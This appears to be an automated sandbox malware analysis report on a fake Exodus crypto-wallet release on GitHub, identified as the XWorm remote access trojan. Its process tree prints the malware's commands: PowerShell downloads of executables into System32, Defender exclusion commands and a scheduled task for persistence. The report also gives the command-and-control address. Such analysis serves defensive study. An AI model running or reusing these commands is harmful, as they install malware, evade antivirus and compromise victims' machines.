xworm | hxxps://github[.]com/ek4o/fake-exodus/releases/tag/ekoTools

Resubmissions

03/03/2025, 16:00

250303-tf222asjz2 5

03/03/2025, 15:28

250303-swbpca1nz4 10

02/03/2025, 14:26

250302-rr1x1awygx 10

Analysis

max time kernel
1019s
max time network
1022s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
03/03/2025, 15:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ek4o/fake-exodus/releases/tag/ekoTools

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3356-425-0x0000000002560000-0x000000000256E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 12 IoCs

flow	pid	Process
109	3860	powershell.exe
111	3860	powershell.exe
113	3276	powershell.exe
114	3276	powershell.exe
117	1184	powershell.exe
118	1184	powershell.exe
119	1496	powershell.exe
120	1496	powershell.exe
121	4232	powershell.exe
122	4232	powershell.exe
124	4840	powershell.exe
125	4840	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3860	powershell.exe
3276	powershell.exe
1184	powershell.exe
1496	powershell.exe
4232	powershell.exe
4840	powershell.exe
1956	powershell.exe
2464	powershell.exe

Downloads MZ/PE file 6 IoCs

flow	pid	Process
122	4232	powershell.exe
125	4840	powershell.exe
111	3860	powershell.exe
114	3276	powershell.exe
118	1184	powershell.exe
120	1496	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000\Control Panel\International\Geo\Nation	ExodusInject.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000\Control Panel\International\Geo\Nation	AggregatorHost.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 17 IoCs

pid	Process
4524	ExodusInject.exe
4828	Exodus.exe
3356	AggregatorHost.exe
4796	ExodusInject.exe
2908	Exodus.exe
1640	System.exe
1612	ExodusInject.exe
1184	Exodus.exe
188	System.exe
288	System.exe
1524	System.exe
3864	System.exe
1120	System.exe
3044	System.exe
2728	System.exe
2248	System.exe
2536	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
120	raw.githubusercontent.com
122	raw.githubusercontent.com
125	raw.githubusercontent.com
110	raw.githubusercontent.com
111	raw.githubusercontent.com
114	raw.githubusercontent.com
118	raw.githubusercontent.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\ExodusInject.exe	powershell.exe
File created	C:\Windows\system32\Exodus.exe	powershell.exe
File created	C:\Windows\system32\ExodusInject.exe	powershell.exe
File opened for modification	C:\Windows\system32\Exodus.exe	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4668	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000_Classes\Local Settings	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1504	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
1196	msedge.exe
1196	msedge.exe
3084	msedge.exe
3084	msedge.exe
2788	identity_helper.exe
2788	identity_helper.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3912	msedge.exe
3104	msedge.exe
3104	msedge.exe
3860	powershell.exe
3860	powershell.exe
3860	powershell.exe
3276	powershell.exe
3276	powershell.exe
3276	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
1496	powershell.exe
1496	powershell.exe
1496	powershell.exe
4232	powershell.exe
4232	powershell.exe
4232	powershell.exe
4840	powershell.exe
4840	powershell.exe
4840	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	4524	ExodusInject.exe
Token: SeBackupPrivilege	3176	vssvc.exe
Token: SeRestorePrivilege	3176	vssvc.exe
Token: SeAuditPrivilege	3176	vssvc.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeIncreaseQuotaPrivilege	1956	powershell.exe
Token: SeSecurityPrivilege	1956	powershell.exe
Token: SeTakeOwnershipPrivilege	1956	powershell.exe
Token: SeLoadDriverPrivilege	1956	powershell.exe
Token: SeSystemProfilePrivilege	1956	powershell.exe
Token: SeSystemtimePrivilege	1956	powershell.exe
Token: SeProfSingleProcessPrivilege	1956	powershell.exe
Token: SeIncBasePriorityPrivilege	1956	powershell.exe
Token: SeCreatePagefilePrivilege	1956	powershell.exe
Token: SeBackupPrivilege	1956	powershell.exe
Token: SeRestorePrivilege	1956	powershell.exe
Token: SeShutdownPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeSystemEnvironmentPrivilege	1956	powershell.exe
Token: SeRemoteShutdownPrivilege	1956	powershell.exe
Token: SeUndockPrivilege	1956	powershell.exe
Token: SeManageVolumePrivilege	1956	powershell.exe
Token: 33	1956	powershell.exe
Token: 34	1956	powershell.exe
Token: 35	1956	powershell.exe
Token: 36	1956	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeIncreaseQuotaPrivilege	2464	powershell.exe
Token: SeSecurityPrivilege	2464	powershell.exe
Token: SeTakeOwnershipPrivilege	2464	powershell.exe
Token: SeLoadDriverPrivilege	2464	powershell.exe
Token: SeSystemProfilePrivilege	2464	powershell.exe
Token: SeSystemtimePrivilege	2464	powershell.exe
Token: SeProfSingleProcessPrivilege	2464	powershell.exe
Token: SeIncBasePriorityPrivilege	2464	powershell.exe
Token: SeCreatePagefilePrivilege	2464	powershell.exe
Token: SeBackupPrivilege	2464	powershell.exe
Token: SeRestorePrivilege	2464	powershell.exe
Token: SeShutdownPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeSystemEnvironmentPrivilege	2464	powershell.exe
Token: SeRemoteShutdownPrivilege	2464	powershell.exe
Token: SeUndockPrivilege	2464	powershell.exe
Token: SeManageVolumePrivilege	2464	powershell.exe
Token: 33	2464	powershell.exe
Token: 34	2464	powershell.exe
Token: 35	2464	powershell.exe
Token: 36	2464	powershell.exe
Token: SeDebugPrivilege	3356	AggregatorHost.exe
Token: SeDebugPrivilege	3356	AggregatorHost.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	4796	ExodusInject.exe
Token: SeDebugPrivilege	1640	System.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	1612	ExodusInject.exe
Token: SeDebugPrivilege	188	System.exe
Token: SeDebugPrivilege	288	System.exe
Token: SeDebugPrivilege	1524	System.exe
Token: SeDebugPrivilege	3864	System.exe
Token: SeDebugPrivilege	1120	System.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
2216	notepad.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe
3084	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3084 wrote to memory of 3136	3084	msedge.exe	80
PID 3084 wrote to memory of 3136	3084	msedge.exe	80
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 2664	3084	msedge.exe	81
PID 3084 wrote to memory of 1196	3084	msedge.exe	82
PID 3084 wrote to memory of 1196	3084	msedge.exe	82
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83
PID 3084 wrote to memory of 1020	3084	msedge.exe	83

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/ek4o/fake-exodus/releases/tag/ekoTools
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffd524a46f8,0x7ffd524a4708,0x7ffd524a4718
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
  2⤵
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:4092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3192 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1724 /prefetch:8
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
  2⤵
  PID:700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2200,4987899629664540952,10129042117134179319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=920 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2216

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Suspicious use of FindShellTrayWindow
PID:2216

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2320

C:\Users\Admin\AppData\Local\Temp\05b66c2a-3b6a-4ae5-a93d-6ee4ad6c4b9b_ExodusWallet.zip.b9b\ExodusLoader.exe
"C:\Users\Admin\AppData\Local\Temp\05b66c2a-3b6a-4ae5-a93d-6ee4ad6c4b9b_ExodusWallet.zip.b9b\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4332
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\86B2.tmp\86B3.tmp\86B4.bat C:\Users\Admin\AppData\Local\Temp\05b66c2a-3b6a-4ae5-a93d-6ee4ad6c4b9b_ExodusWallet.zip.b9b\ExodusLoader.exe"
  2⤵
  PID:696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Windows\system32\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Windows\system32\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3276
- - C:\Windows\system32\ExodusInject.exe
    "C:\Windows\system32\ExodusInject.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAE01.tmp.bat""
      4⤵
      PID:4712
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4668
- - C:\Windows\system32\Exodus.exe
    "C:\Windows\system32\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:4828

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
"C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3356
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1504

C:\Users\Admin\AppData\Local\Temp\24413862-3b90-4024-b7a1-45efa3522311_ExodusWallet.zip.311\ExodusLoader.exe
"C:\Users\Admin\AppData\Local\Temp\24413862-3b90-4024-b7a1-45efa3522311_ExodusWallet.zip.311\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1580
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DC16.tmp\DC17.tmp\DC18.bat C:\Users\Admin\AppData\Local\Temp\24413862-3b90-4024-b7a1-45efa3522311_ExodusWallet.zip.311\ExodusLoader.exe"
  2⤵
  PID:4716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Windows\system32\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
